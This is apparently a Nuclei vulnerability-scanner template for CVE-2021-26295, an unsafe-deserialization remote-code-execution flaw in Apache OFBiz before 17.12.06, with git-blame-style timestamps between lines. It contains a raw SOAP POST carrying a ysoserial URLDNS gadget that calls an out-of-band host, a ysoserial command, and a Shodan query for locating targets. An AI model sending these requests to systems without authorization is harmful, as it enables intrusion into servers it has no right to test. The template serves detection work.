2021-03-23 16:00:15 +00:00
id : CVE-2021-26295
2022-04-22 10:38:41 +00:00
2021-03-23 16:00:15 +00:00
info :
2022-05-18 20:58:07 +00:00
name : Apache OFBiz <17.12.06 - Arbitrary Code Execution
2021-03-23 16:00:15 +00:00
author : madrobot
severity : critical
2022-05-17 20:33:23 +00:00
description : |
Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade Apache OFBiz to version 17.12.06 or later to mitigate this vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-03-25 10:08:15 +00:00
- https://github.com/yumusb/CVE-2021-26295-POC
2022-05-17 20:33:23 +00:00
- https://packetstormsecurity.com/files/162104/Apache-OFBiz-SOAP-Java-Deserialization.html
- https://github.com/zhzyker/exphub/tree/master/ofbiz
2022-05-17 20:46:49 +00:00
- https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
2022-05-18 20:58:07 +00:00
- https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2021-26295
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-26295
cwe-id : CWE-502
2023-12-12 11:07:52 +00:00
epss-score : 0.97455
2023-11-27 09:19:41 +00:00
epss-percentile : 0.99952
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
2021-09-16 15:54:33 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : apache
product : ofbiz
2023-09-06 12:09:01 +00:00
shodan-query : "OFBiz.Visitor="
ysoserial-payload : java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex
2022-08-27 04:41:18 +00:00
tags : packetstorm,cve,cve2021,apache,ofbiz,deserialization,rce
2021-03-24 07:30:26 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-23 16:00:15 +00:00
- raw :
- |
POST /webtools/control/SOAPService HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
2022-05-17 20:33:23 +00:00
<?xml version='1.0' encoding='UTF-8'?>
2021-09-08 12:17:19 +00:00
<soapenv:Envelope
2022-05-17 20:33:23 +00:00
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
2021-09-08 12:17:19 +00:00
<soapenv:Body>
2022-05-17 20:33:23 +00:00
<ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/">
<ns1:cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</ns1:cus-obj>
</ns1:clearAllEntityCaches>
2021-09-08 12:17:19 +00:00
</soapenv:Body>
2021-03-23 16:00:15 +00:00
</soapenv:Envelope>
matchers-condition : and
matchers :
- type : word
2022-05-17 20:33:23 +00:00
part : interactsh_protocol
2021-03-23 16:00:15 +00:00
words :
2022-05-17 20:33:23 +00:00
- "dns"
2021-09-08 12:17:19 +00:00
2021-03-23 16:00:15 +00:00
- type : word
2022-05-17 20:33:23 +00:00
part : body
2021-03-23 16:00:15 +00:00
words :
- "errorMessage"
2022-05-18 20:58:07 +00:00
condition : and
2022-05-17 20:33:23 +00:00
- type : word
part : header
words :
2022-05-18 20:58:07 +00:00
- "OFBiz.Visitor="
2023-12-29 09:30:44 +00:00
# digest: 4a0a0047304502207fceb6c1afd6b61eea8fc64a6f46f583277f2c792ca6c37d0a2a03a34909d67c0221008d49815caf6057b3e04cf2a4e817adb8bcef6f220427227c65c73e825dc390bc:922c64590222798bb761d5b6d8e72950